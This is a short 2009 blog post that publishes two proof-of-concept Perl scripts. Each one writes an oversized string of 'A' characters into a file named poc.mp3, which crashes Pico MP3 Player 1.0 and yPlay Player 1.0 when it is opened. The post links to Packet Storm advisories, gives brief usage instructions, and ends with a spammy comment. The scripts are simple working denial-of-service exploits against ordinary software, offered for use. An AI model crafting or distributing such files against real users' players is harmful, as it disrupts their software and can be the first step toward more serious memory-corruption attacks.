Tuesday, August 25, 2009

two music player crash vulnerability

hi
Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC
http://thaddy.co.uk/picomp3.zip

#!/usr/bin/perl
# platen.secure [at] gmail.com
# Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC
my $crash="A" x 2500;
open(myfile,'>>poc.mp3');
print myfile $crash;

http://packetstormsecurity.org/0908-exploits/pico-dos.txt

#################################################################

yPlay Player 1.0 (.mp3 ) Local File Crash PoC
http://www.spacejock.com/yPlay_Download.html

#!/usr/bin/perl
# platen.secure [at] gmail.com
# yPlay Player 1.0 (.mp3 ) Local File Crash PoC
# http://www.spacejock.com/yPlay_Download.html
my $crash="A" x 2500;
open(myfile,'>>poc.mp3');
print myfile $crash;

http://packetstormsecurity.org/0908-exploits/yplay-crash.txt

usage: first save exploite in expl.pl file and then run this command perl expl.pl \ exploite create poc.mp3 file. if you open poc.mp3 file by vulnerability players , player crash!
Posted by at

1 comment:

  1. UnknownOctober 28, 2009 at 6:31 AM

    Some music players have some basic programming problems. They have chances to crash if they don't have any bug index report.

    cheap mp3 players

    ReplyDelete

Subscribe to: Post Comments (Atom)